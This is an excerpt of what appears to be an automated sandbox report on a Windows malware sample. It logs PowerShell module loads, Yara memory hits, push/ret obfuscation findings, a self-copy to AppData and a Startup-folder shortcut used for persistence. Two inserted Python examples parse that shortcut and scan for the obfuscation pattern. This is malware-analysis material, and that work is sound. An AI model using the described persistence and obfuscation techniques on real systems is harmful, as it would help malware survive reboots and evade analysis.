        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: yVVZdG2NJX.lnk.3.dr | LNK file: ..\..\..\..\..\yVVZdG2NJX.exe
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: yVVZdG2NJX.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
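The LNK entry above records only the shortcut's RELATIVE_PATH (..\..\..\..\..\yVVZdG2NJX.exe); the report elsewhere shows the .lnk being written to the user's Start Menu\Programs\Startup folder. Resolving the relative path against that folder tells you where the persistence entry actually points. The following Python is an added example, not code from the report or from Joe Sandbox: it constructs a minimal ShellLink (MS-SHLLINK layout) that carries only that RELATIVE_PATH string, parses the header and StringData back out, and resolves the relative path the way Explorer would. Only the Startup directory and the RELATIVE_PATH value are taken from this report; the LNK bytes are constructed test data (the real dropped file also has an ID list and other fields), and the user-writable path markers are a heuristic of this example.

```python
"""Parse a Startup-folder .lnk and resolve its RELATIVE_PATH to the real target.

Added example, not part of the Joe Sandbox report. The shortcut bytes are
constructed here; only STARTUP_DIR and REPORTED_RELATIVE_PATH come from the report.
"""
import ntpath
import struct
import uuid
from typing import Dict

HEADER_SIZE = 0x4C  # ShellLinkHeader is always 76 bytes (MS-SHLLINK 2.1)
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# LinkFlags bits that decide which structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData entries appear in this fixed order, each as u16 count + chars.
STRING_DATA_ORDER = (
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
)

# Values taken from this report: where the .lnk was dropped and what it contains.
STARTUP_DIR = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
REPORTED_RELATIVE_PATH = r"..\..\..\..\..\yVVZdG2NJX.exe"

# Heuristic of this example: directory fragments a standard user can write to.
USER_WRITABLE_MARKERS = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\users\\public\\")


def build_minimal_lnk(relative_path: str) -> bytes:
    """Construct a .lnk carrying only a Unicode RELATIVE_PATH (test data, not a clone of the dropped file)."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE
    header = struct.pack(
        "<I16sIIQQQIiIHHII",
        HEADER_SIZE, LNK_CLSID.bytes_le, flags,
        0,            # FileAttributes
        0, 0, 0,      # CreationTime, AccessTime, WriteTime (FILETIME, unset)
        0,            # FileSize
        0,            # IconIndex
        1,            # ShowCommand = SW_SHOWNORMAL
        0, 0,         # HotKey, Reserved1
        0, 0,         # Reserved2, Reserved3
    )
    return header + struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")


def parse_lnk_strings(data: bytes) -> Dict[str, str]:
    """Validate the header, skip IDList/LinkInfo, and return the StringData fields."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a ShellLink: bad HeaderSize")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("not a ShellLink: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    offset = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:       # IDListSize (u16) followed by the item list
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:                 # LinkInfoSize (u32) includes itself
        offset += struct.unpack_from("<I", data, offset)[0]
    strings: Dict[str, str] = {}
    for name, bit in STRING_DATA_ORDER:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, offset)[0]
        offset += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[offset:offset + count * width]
        offset += count * width
        strings[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return strings


def resolve_relative_target(lnk_dir: str, relative_path: str) -> str:
    """Resolve RELATIVE_PATH against the folder holding the .lnk, as Explorer does."""
    return ntpath.normpath(ntpath.join(lnk_dir, relative_path))


def is_user_writable(target: str) -> bool:
    return any(marker in target.lower() for marker in USER_WRITABLE_MARKERS)


def analyse_reported_shortcut() -> Dict[str, object]:
    """Rebuild the report's shortcut and show where the Startup entry really points."""
    strings = parse_lnk_strings(build_minimal_lnk(REPORTED_RELATIVE_PATH))
    target = resolve_relative_target(STARTUP_DIR, strings["relative_path"])
    return {"relative_path": strings["relative_path"], "target": target,
            "user_writable_target": is_user_writable(target)}


if __name__ == "__main__":
    print(analyse_reported_shortcut())
```

Five levels up from the Startup folder is the user's AppData\Roaming directory, so the shortcut resolves to the same AppData\Roaming\yVVZdG2NJX.exe path that the report lists under dropped files: the Startup entry launches the self-copy, not the original sample on the Desktop. On a live host, feed real .lnk bytes from the Startup folder into parse_lnk_strings instead of the constructed ones; a RELATIVE_PATH that climbs out of Program Files into a user-writable location is the thing to flag.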

        Data Obfuscation

        Source: Yara match | File source: 00000000.00000002.1555288349.0000000004473000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.1554696495.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: yVVZdG2NJX.exe PID: 8068, type: MEMORYSTR
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_703D1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_703D1B63
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_703D2FD0 push eax; ret 0_2_703D2FFE
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_02D96348 push eax; ret 5_2_02D96351
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_0352632D push eax; ret 8_2_03526341
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_03527A10 pushfd ; retf 8_2_03527A12
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_03527A09 pushfd ; retf 8_2_03527A0A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_03523A9C push ebx; retf 8_2_03523ADA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_03523D18 push eax; retf 8_2_03523D1A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_03523D30 push edx; retf 8_2_03523D32
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_03523D38 push edx; retf 8_2_03523D3A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_07D84990 pushad ; retf 8_2_07D84991
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_04A81298 push ebx; iretd 10_2_04A8131A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_04A86348 push eax; ret 10_2_04A86351
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_04A80C55 push edi; iretd 10_2_04A80C62
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | File created: C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | File created: C:\Users\user\AppData\Local\Temp\nsg9061.tmp\System.dll
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yVVZdG2NJX.lnk
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yVVZdG2NJX.lnk
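The "push reg; ret", "pushfd ; retf", "pushad ; retf" and "push reg; iretd" entries in the Data Obfuscation block are return-based control transfers: the pushed value becomes the new EIP (and, for retf/iretd, CS and EFLAGS), so a linear disassembler loses the real control flow. The following Python is an added example, not code from the report or from Joe Sandbox: a byte-level scanner for those opcode pairs over a constructed 32-bit x86 byte string. It approximates what the sandbox does on disassembled functions. With max_gap=0 it reports only a push immediately followed by a return-family opcode; a wider gap finds split pairs like the report's 0_2_703D2FD0 / 0_2_703D2FFE hit, but because the scanner does not decode instruction lengths it then also matches operand bytes and unrelated returns, which the sample demonstrates. The same pairs occur in legitimate code, so treat hits as a weak indicator to be read alongside the Yara and behaviour evidence, not on their own.

```python
"""Scan raw 32-bit x86 bytes for push/ret style control transfers.

Added example, not part of the Joe Sandbox report. SAMPLE_CODE is a constructed
byte string, not memory from the analysed sample.
"""
from collections import Counter
from typing import Dict, List, Tuple

# Single-byte push opcodes: 0x50..0x57 push r32, 0x60 pushad, 0x9C pushfd.
PUSH_OPCODES: Dict[int, str] = {
    0x50 + i: f"push {reg}"
    for i, reg in enumerate(("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"))
}
PUSH_OPCODES[0x60] = "pushad"
PUSH_OPCODES[0x9C] = "pushfd"

# Return-family opcodes that pop the pushed value into EIP (and CS/EFLAGS for retf/iretd).
RETURN_OPCODES: Dict[int, str] = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}

Gadget = Tuple[int, int, str]  # (push offset, return offset, "push eax; ret")


def find_push_ret_gadgets(code: bytes, base: int = 0, max_gap: int = 0) -> List[Gadget]:
    """Return every push opcode followed by a return-family opcode.

    max_gap is the number of bytes allowed between the push and the return.
    0 matches only adjacent pairs. Larger values find pairs split by other
    instructions (as in the report's 0_2_703D2FD0 / 0_2_703D2FFE hit) but,
    because this is not a disassembler, they also match operand bytes and
    unrelated returns, so false positives rise with the gap.
    """
    hits: List[Gadget] = []
    for i, byte in enumerate(code):
        push = PUSH_OPCODES.get(byte)
        if push is None:
            continue
        for j in range(i + 1, min(len(code), i + 2 + max_gap)):
            ret = RETURN_OPCODES.get(code[j])
            if ret is not None:
                hits.append((base + i, base + j, f"{push}; {ret}"))
                break
    return hits


def summarize(gadgets: List[Gadget]) -> Dict[str, int]:
    """Count hits per mnemonic pair, e.g. {"push eax; ret": 1, ...}."""
    return dict(Counter(mnemonic for _, _, mnemonic in gadgets))


# Constructed test bytes: a normal prologue, then the pairs the report lists,
# then an ordinary function tail (xor eax, eax; ret).
SAMPLE_CODE = bytes([
    0x55, 0x8B, 0xEC,   # push ebp; mov ebp, esp
    0x50, 0xC3,         # push eax; ret
    0x90, 0x90,         # nop; nop
    0x9C, 0xCB,         # pushfd; retf
    0x53, 0xCB,         # push ebx; retf
    0x60, 0xCB,         # pushad; retf
    0x57, 0xCF,         # push edi; iretd
    0x33, 0xC0, 0xC3,   # xor eax, eax; ret
])

if __name__ == "__main__":
    for gap in (0, 4):
        found = find_push_ret_gadgets(SAMPLE_CODE, base=0x703D2F00, max_gap=gap)
        print(f"max_gap={gap}: {len(found)} hits, {summarize(found)}")
        for push_off, ret_off, mnemonic in found:
            print(f"  {push_off:08X} .. {ret_off:08X}  {mnemonic}")
```

With max_gap=0 the scanner reports the five deliberate pairs and nothing else. With max_gap=4 it additionally pairs the prologue's push ebp with the ret that belongs to the push eax gadget four bytes later, a false positive that shows why the sandbox's function-level disassembly gives cleaner results than a byte scan, and why a handful of such hits in a process that also JIT-compiles .NET code (here powershell.exe) should not be scored on their own.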

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (12 identical entries in the report)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (9 identical entries in the report)
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Process information set: NOOPENFILEERRORBOX (78 identical entries in the report)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
